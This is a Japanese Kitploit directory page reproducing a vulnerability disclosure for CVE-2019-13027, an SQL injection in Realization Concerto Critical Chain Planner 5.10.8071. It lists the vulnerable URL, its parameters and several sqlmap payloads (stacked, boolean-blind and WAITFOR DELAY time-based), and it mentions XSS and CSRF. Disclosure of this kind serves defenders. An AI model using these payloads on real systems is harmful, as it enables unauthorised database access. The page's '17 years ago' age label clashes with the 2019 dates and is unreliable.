Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-13027 — CVE-2019-13027 開示の詳細 | Kitploit
ツール/GitHubGitHub/ickogz/cve-2019-13027
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubickogz/cve-2019-13027

CVE-2019-13027

CVE-2019-13027 開示の詳細

リポジトリを見る
17年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-13027

CVE-2019-13027 開示の詳細

ベンダー連絡のタイムライン: 1st July 2019 -> 応答なし、メールの返信なし。

4th July 2019 -> 応答なし、メールの返信なし。

8th July 2019 -> メール送信、Github 作成。

11 July 2019 -> ベンダーからの応答なし。脆弱性を開示。

[脆弱性タイプ] SQL インジェクション [影響を受ける製品コードベース] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - バージョン: 5.10.8071 (5.x ブランチの他のバージョンも影響を受ける可能性があります。>他のブランチではテストできません)

[影響を受けるコンポーネント] Realization Concerto Critical Chain Planner (別名 CCPM) 5.10.8071 にはいくつかの重大なセキュリティ問題があり、少なくとも taskupdt/taskdetails.aspx ウェブページで "projectname" パラメータを介した SQL インジェクションがあります。


[攻撃タイプ] リモート

[攻撃ベクトル] アプリケーションには多くの反射型 XSS/CSRF(例:checklist/checklist)がありますが、難しいのは SQL インジェクションです。SQL Server のバージョンや IDS/IPS によっては、いくつかの改変が必要です。

URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined

ProjectName (foo) は存在し、有効である必要があります。残りのパラメータをファズする(または実際のリクエストを使用する)。 foo には XSS もあります。

検出された SQL(SQLMAP からのペイロード) パラメータ: projectname (GET)

root@kitploit:~
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: projectname=foo';WAITFOR DELAY '0:0:5'--

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: projectname=foo' AND 3676=3676-- 

Type: time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (IF)
Payload: projectname=foo' WAITFOR DELAY '0:0:5'-- 

[製品のベンダー] REALIZATION - https://www.realization.com/

ツールをダウンロード